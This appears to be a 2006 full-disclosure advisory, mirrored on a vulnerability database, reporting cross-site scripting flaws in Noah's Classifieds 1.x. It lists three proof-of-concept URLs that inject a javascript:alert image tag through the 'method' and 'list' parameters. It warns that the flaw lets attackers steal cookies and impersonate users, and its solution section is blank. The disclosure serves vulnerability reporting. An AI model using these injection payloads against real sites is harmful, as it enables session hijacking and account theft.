Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11752
HistoryMar 09, 2006 - 12:00 a.m.

[Full-disclosure] Noah's Classifieds Multiple Cross-Site Scripting Vulnerabilities

2006-03-0900:00:00
vulners.com
29

###########################################################################

Advisory #10 Title: Noah's Classifieds Multiple Cross-Site Scripting Vulnerabilities

Author: 0o_zeus_o0 ( Arturo Z. )

Contact: [email protected]

Website: www.elitemexico.org

Date: 09/03/2006

Risk: Medium

Vendor Url: http://classifieds.phpoutsourcing.com/

Affected Software: Noah's Classifieds

Non Affected:

We Are: olimpus klan team

#Info:
##################################################################
#this bug consists of inserting script in the line of execution of

#the affected system causing the robbery of cookie and like consequence

#the identity robbery of the affected user or administrator

#Example XSS:
##################################################################

#http://www.example.com/[dirpath]/index.php?method=showhtmllist&list=<IMG SRC=`javascript:alert("0o_zeus_o0, 'XSS'")`>

#http://www.example.com/[dirpath]/index.php?method=<IMG SRC=`javascript:alert("0o_zeus_o0, 'XSS'")`>

#http://www.example.com/[dirpath]/index.php?method=login_form&list=<IMG SRC=`javascript:alert("0o_zeus_o0, 'XSS'")`>

##################################################################

#Solution:
##################################################################

#VULNERABLE VERSIONS
##################################################################

#1.x Other versions may also be affected.

##################################################################
#Contact information
#0o_zeus_o0
#[email protected]
#www.elitemexico.org
##################################################################
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
##############################################################################